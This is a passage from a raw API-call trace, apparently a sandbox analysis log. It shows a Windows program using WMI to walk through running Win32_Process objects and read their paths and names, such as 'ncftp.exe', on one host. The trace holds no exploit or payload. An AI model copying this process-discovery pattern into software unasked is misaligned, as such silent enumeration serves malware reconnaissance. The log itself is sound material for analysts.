[5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.596] IUnknown:AddRef (This=0x5712f20) returned 0x3 [0279.597] IUnknown:QueryInterface (in: This=0x5712f20, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.597] IUnknown:QueryInterface (in: This=0x5712f20, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.597] IUnknown:QueryInterface (in: This=0x5712f20, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5712f24) returned 0x0 [0279.597] IMarshal:GetUnmarshalClass (in: This=0x5712f24, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.597] IUnknown:Release (This=0x5712f24) returned 0x3 [0279.597] IUnknown:QueryInterface (in: This=0x5712f20, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.597] IUnknown:Release (This=0x5712f20) returned 0x2 [0279.597] IUnknown:QueryInterface (in: This=0x5712f20, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5712f20) returned 0x0 [0279.598] IUnknown:AddRef (This=0x5712f20) returned 0x4 [0279.598] IUnknown:Release (This=0x5712f20) returned 0x3 [0279.598] IUnknown:Release (This=0x5712f20) returned 0x2 [0279.598] CoTaskMemFree (pv=0x5716130) [0279.598] IUnknown:AddRef (This=0x5712f20) returned 0x3 [0279.598] IWbemClassObject:Get (in: This=0x5712f20, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.598] IWbemClassObject:Get (in: This=0x5712f20, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3060\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.599] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.599] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.599] IUnknown:Release (This=0x500344) returned 0x1 [0279.599] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x5716130) returned 0x0 [0279.600] WbemDefPath:IUnknown:QueryInterface (in: This=0x5716130, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.600] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5716130, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e708) returned 0x0 [0279.600] WbemDefPath:IUnknown:Release (This=0x5716130) returned 0x0 [0279.600] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e708, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e708) returned 0x0 [0279.600] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e708, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.601] WbemDefPath:IUnknown:AddRef (This=0x570e708) returned 0x3 [0279.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e708, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e708, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e708, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x5716140) returned 0x0 [0279.601] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5716140, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.601] WbemDefPath:IUnknown:Release (This=0x5716140) returned 0x3 [0279.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e708, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.601] WbemDefPath:IUnknown:Release (This=0x570e708) returned 0x2 [0279.601] WbemDefPath:IUnknown:Release (This=0x570e708) returned 0x1 [0279.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e708, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e708) returned 0x0 [0279.602] WbemDefPath:IUnknown:AddRef (This=0x570e708) returned 0x3 [0279.602] WbemDefPath:IUnknown:Release (This=0x570e708) returned 0x2 [0279.602] WbemDefPath:IWbemPath:SetText (This=0x570e708, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3060\"") returned 0x0 [0279.602] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.602] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.602] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.602] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.602] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.602] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.602] IWbemClassObject:Get (in: This=0x5712f20, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d38c8*=0, plFlavor=0x27d38cc*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="active-charge.exe", varVal2=0x0), pType=0x27d38c8*=8, plFlavor=0x27d38cc*=0) returned 0x0 [0279.603] IWbemClassObject:Get (in: This=0x5712f20, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d38c8*=8, plFlavor=0x27d38cc*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="active-charge.exe", varVal2=0x0), pType=0x27d38c8*=8, plFlavor=0x27d38cc*=0) returned 0x0 [0279.603] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x5716170, puReturned=0x27bb39c | out: apObjects=0x5716170*=0x57130b8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.604] IUnknown:QueryInterface (in: This=0x57130b8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x57130b8) returned 0x0 [0279.604] IUnknown:QueryInterface (in: This=0x57130b8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.604] IUnknown:QueryInterface (in: This=0x57130b8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.604] IUnknown:AddRef (This=0x57130b8) returned 0x3 [0279.605] IUnknown:QueryInterface (in: This=0x57130b8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.605] IUnknown:QueryInterface (in: This=0x57130b8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.605] IUnknown:QueryInterface (in: This=0x57130b8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x57130bc) returned 0x0 [0279.605] IMarshal:GetUnmarshalClass (in: This=0x57130bc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.605] IUnknown:Release (This=0x57130bc) returned 0x3 [0279.605] IUnknown:QueryInterface (in: This=0x57130b8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.605] IUnknown:Release (This=0x57130b8) returned 0x2 [0279.606] IUnknown:QueryInterface (in: This=0x57130b8, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x57130b8) returned 0x0 [0279.606] IUnknown:AddRef (This=0x57130b8) returned 0x4 [0279.606] IUnknown:Release (This=0x57130b8) returned 0x3 [0279.606] IUnknown:Release (This=0x57130b8) returned 0x2 [0279.606] CoTaskMemFree (pv=0x5716170) [0279.606] IUnknown:AddRef (This=0x57130b8) returned 0x3 [0279.606] IWbemClassObject:Get (in: This=0x57130b8, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.606] IWbemClassObject:Get (in: This=0x57130b8, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3068\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.607] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.607] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.607] IUnknown:Release (This=0x500344) returned 0x1 [0279.608] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x5716170) returned 0x0 [0279.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x5716170, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.608] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5716170, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e7e8) returned 0x0 [0279.608] WbemDefPath:IUnknown:Release (This=0x5716170) returned 0x0 [0279.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e7e8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e7e8) returned 0x0 [0279.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e7e8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.609] WbemDefPath:IUnknown:AddRef (This=0x570e7e8) returned 0x3 [0279.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e7e8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e7e8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e7e8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x5716180) returned 0x0 [0279.609] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5716180, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.609] WbemDefPath:IUnknown:Release (This=0x5716180) returned 0x3 [0279.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e7e8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.610] WbemDefPath:IUnknown:Release (This=0x570e7e8) returned 0x2 [0279.610] WbemDefPath:IUnknown:Release (This=0x570e7e8) returned 0x1 [0279.610] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e7e8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e7e8) returned 0x0 [0279.610] WbemDefPath:IUnknown:AddRef (This=0x570e7e8) returned 0x3 [0279.610] WbemDefPath:IUnknown:Release (This=0x570e7e8) returned 0x2 [0279.610] WbemDefPath:IWbemPath:SetText (This=0x570e7e8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3068\"") returned 0x0 [0279.610] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.610] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.610] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.611] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.611] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.611] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.611] IWbemClassObject:Get (in: This=0x57130b8, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d4158*=0, plFlavor=0x27d415c*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ncftp.exe", varVal2=0x0), pType=0x27d4158*=8, plFlavor=0x27d415c*=0) returned 0x0 [0279.611] IWbemClassObject:Get (in: This=0x57130b8, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d4158*=8, plFlavor=0x27d415c*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ncftp.exe", varVal2=0x0), pType=0x27d4158*=8, plFlavor=0x27d415c*=0) returned 0x0 [0279.611] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x57161b0, puReturned=0x27bb39c | out: apObjects=0x57161b0*=0x5713250, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.658] IUnknown:QueryInterface (in: This=0x5713250, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5713250) returned 0x0 [0279.659] IUnknown:QueryInterface (in: This=0x5713250, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.659] IUnknown:QueryInterface (in: This=0x5713250, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.660] IUnknown:AddRef (This=0x5713250) returned 0x3 [0279.660] IUnknown:QueryInterface (in: This=0x5713250, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.660] IUnknown:QueryInterface (in: This=0x5713250, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.660] IUnknown:QueryInterface (in: This=0x5713250, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5713254) returned 0x0 [0279.660] IMarshal:GetUnmarshalClass (in: This=0x5713254, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.660] IUnknown:Release (This=0x5713254) returned 0x3 [0279.660] IUnknown:QueryInterface (in: This=0x5713250, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.661] IUnknown:Release (This=0x5713250) returned 0x2 [0279.661] IUnknown:QueryInterface (in: This=0x5713250, 